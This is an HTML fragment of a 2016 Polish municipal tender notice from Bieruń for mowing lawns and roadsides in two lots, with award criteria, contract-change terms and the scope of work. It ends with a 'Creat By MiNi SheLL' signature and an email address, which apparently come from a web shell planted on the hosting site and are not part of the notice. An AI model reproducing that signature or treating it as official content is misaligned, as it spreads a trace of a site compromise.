<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy w zakresie:
a) Wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany  zgodnie                  z obowiązującą stawką. 
b) Zmiany podwykonawcy lub powierzenia podwykonawcy części zakresu zamówienia w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania oferty.
Jeżeli zmiana lub rezygnacja podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art., 26 ust. 2b ustawy Prawo zamówień publicznych, 
w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust.1  ww. ustawy, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany 
w trakcie postępowania o udzielenie zamówienia. 
c)	Mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana powszechnie      
obowiązujących przepisów prawa.
 e) Innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ , a które nie  wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu, 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2016 godzina 11:00, miejsce: Urząd Miejski w Bieruniu - Kancelaria, parter, 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> UTRZYMANIE ZIELENI  W GMINIE BIERUŃ W ROKU 2016:
Zadanie 1 - Trawniki, pobocza w rejonie Bierunia Nowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest koszenie miejskich trawników i poboczy oraz zagospodarowanie skoszonej trawy i liści, obejmujące swoim zakresem w szczególności:
a)	Skoszenie trawy z trawników i poboczy do uzyskania równej powierzchni cięcia.
b)	Wycięcie samosiewów drzew, których obwód pnia na wysokości 5 cm nie przekracza:
                 35 cm - w przypadku topoli, wierzb, kasztanowca zwyczajnego, klonu jesionolistnego, klonu srebrzystego,  
                  robinii akacjowej oraz platanu klonolistnego,
                 25 cm - w przypadku pozostałych gatunków drzew.
c)	Wycięcie wszystkich odrostów z pni.
d)	Zebranie i usunięcie odpadów nie ulegających biodegradacji.
e)	Zebranie skoszonej trawy z miejsc przyległych do trawników i poboczy np. chodników, ulic.
f)	Zebranie trawy i gałęzi w stosy - nie dotyczy trawników o koszeniu jednokrotnym (poza terenami innymi).
g)	Zebranie z trawników, poboczy i rowów skoszonej trawy, śmieci, liści, gałęzi.
h)	Przekazanie zebranej trawy, liści i gałęzi do kompostowni a śmieci na składowisko odpadów.
i)	Jesienne sprzątnięcie z trawników liści, gałęzi i śmieci.

2.	W zależności od częstości koszeń trawniki podzielono na klasy. Szczegółowy podział znajduje się w załączniku nr 5, 6 i 7 do SIWZ. 
3.	Ogólny zakres szerokości koszenia poboczy przedstawia poniższa tabela:

CHARAKTER POBOCZA	SZEROKOŚĆ KOSZENIA OD KRAWĘDZI JEZDNI
Pobocze na równym terenie tzn. nachylenie jest mniejsze lub równe 5%	3 m na prostych odcinkach, 4 m w środku łuku zakrętu (lub do linii upraw na terenach rolniczych)
Pobocze ze skarpą tzn. nachylenie jest większe od 5%	Do podnóża skarpy, lecz nie dalej niż 12 m
Pobocze z rowem odwadniającym	Cały rów do wierzchołka skarpy zewnętrznej lecz nie dalej niż14 m


4. Przy realizacji zamówienia Wykonawca zobowiązany jest: 
a)	Poinformować, z co najmniej jednodniowym wyprzedzeniem, właścicieli samochodów parkujących przy trawnikach, o terminach koszenia (np. ulotki wywieszane w miejscu koszeń lub w pobliżu).
b)	Zwrócić szczególną uwagę na drzewa rosnące na terenie koszonym, zwłaszcza nowe nasadzenia. Jeżeli nie posiadają one zabezpieczenia przy podstawie pnia to należy zachować wokół niego strefę ochronną nie koszonej trawy o szerokości 5 cm. W przypadku zniszczenia nasadzeń wykonawca dokona nasadzenia tożsamego w zakresie gatunku i wieku, a w przypadku drzew i krzewów w wieku 10 lat i powyżej, zostanie naliczona kara administracyjna zgodnie z przepisami ustawy o ochronie przyrody (tekst jednolity Dz.U. z 2013 r. , poz. 627 z późn. zm.)
c)	Prowadzić szczegółowy obmiar prac oraz terminów ich wykonania w rozbiciu na miesiące, określone w załącznikach 6 i 7 do SIWZ. Zapisy faktycznie wykonanych prac, wraz z określeniem krotności ich wykonania dołączone do faktury będą podstawą finansowego rozliczenia.
5. Powyższe usługi objęte są stawką VAT w wysokości 8%.            
6. Wymagania w zakresie realizacji zamówienia zawiera również wzór umowy, stanowiący załącznik do 
     SIWZ.
7. Prace będą zlecane przez inspektora GK wg potrzeb (w godzinach pracy Urzędu Miejskiego 
     w Bieruniu) w dwóch trybach:
a)	tryb podstawowy - zlecenie przesłane pisemnie, faksem lub pocztą elektroniczną - termin realizacji do 72 godzin od wysłania zlecenia przez Zamawiającego;
b)	tryb priorytetowy - zlecenie przekazane telefonicznie w pilnych przypadkach (w miarę możliwości potwierdzone faksem lub pocztą elektroniczną) - termin realizacji do 24 godzin od wysłania zlecenia przez Zamawiającego.
8. Zamawiający zastrzega sobie:
a)	Możliwość wprowadzenia zmian w ilości zleconych powierzchni do koszenia.
b)	Ustalanie kolejności koszenia poszczególnych trawników.
c)	Możliwość zmian w lokalizacji powierzchni do koszenia - dotyczy pozycji: Tereny inne,
w załącznikach nr 6 do SIWZ. O wszelkich w/w zmianach Wykonawca zostanie niezwłocznie powiadomiony (tj. do 24 godzin przed rozpoczęciem danego koszenia).
9. Zamawiający przewiduje udzielanie zamówień uzupełniających na podstawie ustawy pzp. 
    Zakres zamówienia zawiera załącznik nr 8 do SIWZ.
10.Zamawiający nie przewiduje dynamicznego systemu zakupów, aukcji elektronicznej, zawarcia umowy ramowej w rozumieniu ustawy pzp oraz udzielania zaliczek na poczet wykonania umowy, stosowania wymagań, o których mowa w art. 29 ust. 4 ustawy pzp.
11. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.
12. Zamawiający dopuszcza składanie ofert częściowych (zadanie 1 lub zadanie 2).
13. Zamawiający nie dopuszcza składania ofert wariantowych.
14. Kody Wspólnego Słownika Zamówień CPV: 77314100-5 Usługi w zakresie trawników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> UTRZYMANIE ZIELENI  W GMINIE BIERUŃ W ROKU 2016:
Zadanie 2 - Trawniki, pobocza w rejonie Bierunia Starego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest koszenie miejskich trawników i poboczy oraz zagospodarowanie skoszonej trawy i liści, obejmujące swoim zakresem w szczególności:
a)	Skoszenie trawy z trawników i poboczy do uzyskania równej powierzchni cięcia.
b)	Wycięcie samosiewów drzew, których obwód pnia na wysokości 5 cm nie przekracza:
                 35 cm - w przypadku topoli, wierzb, kasztanowca zwyczajnego, klonu jesionolistnego, klonu srebrzystego,  
                  robinii akacjowej oraz platanu klonolistnego,
                 25 cm - w przypadku pozostałych gatunków drzew.
c)	Wycięcie wszystkich odrostów z pni.
d)	Zebranie i usunięcie odpadów nie ulegających biodegradacji.
e)	Zebranie skoszonej trawy z miejsc przyległych do trawników i poboczy np. chodników, ulic.
f)	Zebranie trawy i gałęzi w stosy - nie dotyczy trawników o koszeniu jednokrotnym (poza terenami innymi).
g)	Zebranie z trawników, poboczy i rowów skoszonej trawy, śmieci, liści, gałęzi.
h)	Przekazanie zebranej trawy, liści i gałęzi do kompostowni a śmieci na składowisko odpadów.
i)	Jesienne sprzątnięcie z trawników liści, gałęzi i śmieci.

2.	W zależności od częstości koszeń trawniki podzielono na klasy. Szczegółowy podział znajduje się w załączniku nr 5, 6 i 7 do SIWZ. 
3.	Ogólny zakres szerokości koszenia poboczy przedstawia poniższa tabela:

CHARAKTER POBOCZA	SZEROKOŚĆ KOSZENIA OD KRAWĘDZI JEZDNI
Pobocze na równym terenie tzn. nachylenie jest mniejsze lub równe 5%	3 m na prostych odcinkach, 4 m w środku łuku zakrętu (lub do linii upraw na terenach rolniczych)
Pobocze ze skarpą tzn. nachylenie jest większe od 5%	Do podnóża skarpy, lecz nie dalej niż 12 m
Pobocze z rowem odwadniającym	Cały rów do wierzchołka skarpy zewnętrznej lecz nie dalej niż14 m


4. Przy realizacji zamówienia Wykonawca zobowiązany jest: 
a)	Poinformować, z co najmniej jednodniowym wyprzedzeniem, właścicieli samochodów parkujących przy trawnikach, o terminach koszenia (np. ulotki wywieszane w miejscu koszeń lub w pobliżu).
b)	Zwrócić szczególną uwagę na drzewa rosnące na terenie koszonym, zwłaszcza nowe nasadzenia. Jeżeli nie posiadają one zabezpieczenia przy podstawie pnia to należy zachować wokół niego strefę ochronną nie koszonej trawy o szerokości 5 cm. W przypadku zniszczenia nasadzeń wykonawca dokona nasadzenia tożsamego w zakresie gatunku i wieku, a w przypadku drzew i krzewów w wieku 10 lat i powyżej, zostanie naliczona kara administracyjna zgodnie z przepisami ustawy o ochronie przyrody (tekst jednolity Dz.U. z 2013 r. , poz. 627 z późn. zm.)
c)	Prowadzić szczegółowy obmiar prac oraz terminów ich wykonania w rozbiciu na miesiące, określone w załącznikach 6 i 7 do SIWZ. Zapisy faktycznie wykonanych prac, wraz z określeniem krotności ich wykonania dołączone do faktury będą podstawą finansowego rozliczenia.
5. Powyższe usługi objęte są stawką VAT w wysokości 8%.            
6. Wymagania w zakresie realizacji zamówienia zawiera również wzór umowy, stanowiący załącznik do 
     SIWZ.
7. Prace będą zlecane przez inspektora GK wg potrzeb (w godzinach pracy Urzędu Miejskiego 
     w Bieruniu) w dwóch trybach:
a)	tryb podstawowy - zlecenie przesłane pisemnie, faksem lub pocztą elektroniczną - termin realizacji do 72 godzin od wysłania zlecenia przez Zamawiającego;
b)	tryb priorytetowy - zlecenie przekazane telefonicznie w pilnych przypadkach (w miarę możliwości potwierdzone faksem lub pocztą elektroniczną) - termin realizacji do 24 godzin od wysłania zlecenia przez Zamawiającego.
8. Zamawiający zastrzega sobie:
a)	Możliwość wprowadzenia zmian w ilości zleconych powierzchni do koszenia.
b)	Ustalanie kolejności koszenia poszczególnych trawników.
c)	Możliwość zmian w lokalizacji powierzchni do koszenia - dotyczy pozycji: Tereny inne,
w załącznikach nr 6 do SIWZ. O wszelkich w/w zmianach Wykonawca zostanie niezwłocznie powiadomiony (tj. do 24 godzin przed rozpoczęciem danego koszenia).
9. Zamawiający przewiduje udzielanie zamówień uzupełniających na podstawie ustawy pzp. 
    Zakres zamówienia zawiera załącznik nr 8 do SIWZ.
10.Zamawiający nie przewiduje dynamicznego systemu zakupów, aukcji elektronicznej, zawarcia umowy ramowej w rozumieniu ustawy pzp oraz udzielania zaliczek na poczet wykonania umowy, stosowania wymagań, o których mowa w art. 29 ust. 4 ustawy pzp.
11. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.
12. Zamawiający dopuszcza składanie ofert częściowych (zadanie 1 lub zadanie 2).
13. Zamawiający nie dopuszcza składania ofert wariantowych.
14. Kody Wspólnego Słownika Zamówień CPV: 77314100-5 Usługi w zakresie trawników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com